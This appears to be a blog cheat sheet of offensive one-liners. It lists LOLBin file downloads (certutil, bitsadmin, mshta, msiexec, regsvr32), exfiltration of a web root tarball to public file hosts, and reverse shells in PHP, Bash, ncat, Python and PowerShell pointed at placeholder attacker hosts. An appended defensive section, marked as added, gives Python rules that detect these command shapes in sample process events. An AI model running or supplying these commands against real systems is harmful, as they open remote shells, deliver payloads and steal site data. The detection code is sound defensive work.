Handy Tricks


Simple Services

FTP

python -m pyftpdlib -w

DNS

python -m dnslib.intercept

HTTP

php -S 0.0.0.0:8000
python2 -m SimpleHTTPServer
python3 -m http.server 8000

File Operations

Writing Files

  • Bash
echo Base64 | base64 -d > File
  • Certutil
echo Base64 > Temp && certutil -f -decode Temp File
  • PowerShell
[IO.File]::WriteAllBytes('%TEMP%\File',[Convert]::FromBase64String('Base64'))

Downloading Files

  • Curl
curl -kL http://example.com/File -o File
  • Wget
wget --no-check-certificate http://example.com/File -O File
  • Certutil
certutil -urlcache -split -f http://example.com/File File
certutil -urlcache -split -f http://example.com/File delete
  • Bitsadmin
bitsadmin /transfer job http://example.com/File %TEMP%\File
  • PowerShell
(New-Object System.Net.WebClient).DownloadFile('http://example.com/File','File')

Uploading Files

  • Curl
tar -zcvf /tmp/File.tar.gz -P /var/www/html
curl -F "file=@/tmp/File.tar.gz" https://file.io > info.json
curl -F "file=@/tmp/File.tar.gz" https://api.anonfiles.com/upload > info.json

Reverse Shells

PHP

php -r '$sock=fsockopen("x.x.x.x",yyyy); exec("/bin/bash -i <&3 >&3 2>&3");'

Bash

bash -i >& /dev/tcp/x.x.x.x/yyyy 0>&1

Ncat

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x yyyy > /tmp/f

Mshta

mshta http://x.x.x.x/shell.hta

Python

python -c 'import os, socket, subprocess; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("x.x.x.x", yyyy)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); subprocess.call(["/bin/bash", "-i"])'

Msiexec

msiexec /q /i http://x.x.x.x/shell.msi

Regsvr32

regsvr32 /s /n /u /i:http://x.x.x.x/shell.sct scrobj.dll

PowerShell

powershell -nop -c "$TCP = New-Object System.Net.Sockets.TCPClient('x.x.x.x', yyyy); $CMD = $TCP.GetStream(); [byte[]]$Bytes = 0..65535 | % { 0 }; while (($I = $CMD.Read($Bytes, 0, $Bytes.Length)) -ne 0) {$Send = [Text.Encoding]::ASCII.GetBytes((iex(New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes, 0, $I) 2>&1 | Out-String) + (PWD).Path + '> '); $CMD.Write($Send, 0, $Send.Length); $CMD.Flush()}; $TCP.Close()"
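As an added defensive example that is not part of the original post: the LOLBin and reverse-shell one-liners above share recognisable command-line shapes. The Python below matches those shapes against constructed process-creation events; the event fields, sample PIDs and rule names are assumptions, not a real EDR schema.

```python
import re

# Constructed sample process-creation events, modelled on the one-liners
# listed on this page (hypothetical data; field names are assumptions).
SAMPLE_EVENTS = [
    {"pid": 4101, "image": "certutil.exe", "cmdline": "certutil -urlcache -split -f http://example.com/File File"},
    {"pid": 4102, "image": "certutil.exe", "cmdline": "certutil -f -decode Temp File"},
    {"pid": 4103, "image": "regsvr32.exe", "cmdline": "regsvr32 /s /n /u /i:http://x.x.x.x/shell.sct scrobj.dll"},
    {"pid": 4104, "image": "mshta.exe", "cmdline": "mshta http://x.x.x.x/shell.hta"},
    {"pid": 4105, "image": "msiexec.exe", "cmdline": "msiexec /q /i http://x.x.x.x/shell.msi"},
    {"pid": 4106, "image": "bitsadmin.exe", "cmdline": "bitsadmin /transfer job http://example.com/File C:\\Temp\\File"},
    {"pid": 4107, "image": "powershell.exe", "cmdline": "powershell -nop -c \"$TCP = New-Object System.Net.Sockets.TCPClient('x.x.x.x', 4444); ...\""},
    {"pid": 4108, "image": "bash", "cmdline": "bash -i >& /dev/tcp/x.x.x.x/4444 0>&1"},
    # Benign look-alikes: local MSI install and a file hash check.
    {"pid": 4109, "image": "msiexec.exe", "cmdline": "msiexec /i C:\\installers\\app.msi /qn"},
    {"pid": 4110, "image": "certutil.exe", "cmdline": "certutil -hashfile C:\\file.iso SHA256"},
]

# Each rule: (name, image it applies to or None for any, regex on the command line).
# The patterns mirror the command shapes shown on this page.
RULES = [
    ("certutil_remote_fetch", "certutil.exe", re.compile(r"-urlcache\b.*\bhttps?://", re.I)),
    ("certutil_base64_decode", "certutil.exe", re.compile(r"-decode\b", re.I)),
    ("regsvr32_remote_scriptlet", "regsvr32.exe", re.compile(r"/i:\s*https?://.*scrobj\.dll", re.I)),
    ("mshta_remote_hta", "mshta.exe", re.compile(r"\bhttps?://", re.I)),
    ("msiexec_remote_package", "msiexec.exe", re.compile(r"/i\s+https?://", re.I)),
    ("bitsadmin_transfer", "bitsadmin.exe", re.compile(r"/transfer\b", re.I)),
    ("powershell_tcpclient_shell", "powershell.exe", re.compile(r"Net\.Sockets\.TCPClient", re.I)),
    ("bash_dev_tcp_shell", None, re.compile(r"/dev/tcp/", re.I)),
]


def match_event(event):
    """Return the names of all rules that fire on one event."""
    hits = []
    for name, image, pattern in RULES:
        if image is not None and event["image"].lower() != image:
            continue  # rule is scoped to a different binary
        if pattern.search(event["cmdline"]):
            hits.append(name)
    return hits


def scan(events):
    """Return {pid: [rule names]} for every event that triggers at least one rule."""
    findings = {}
    for ev in events:
        hits = match_event(ev)
        if hits:
            findings[ev["pid"]] = hits
    return findings
```

The benign entries (local MSI install, certutil hash check) show why each rule is scoped to both the binary and the remote-URL or decode argument rather than the binary name alone.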

Author: DongHuangT1
License: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC 4.0. Please credit DongHuangT1 as the source when republishing!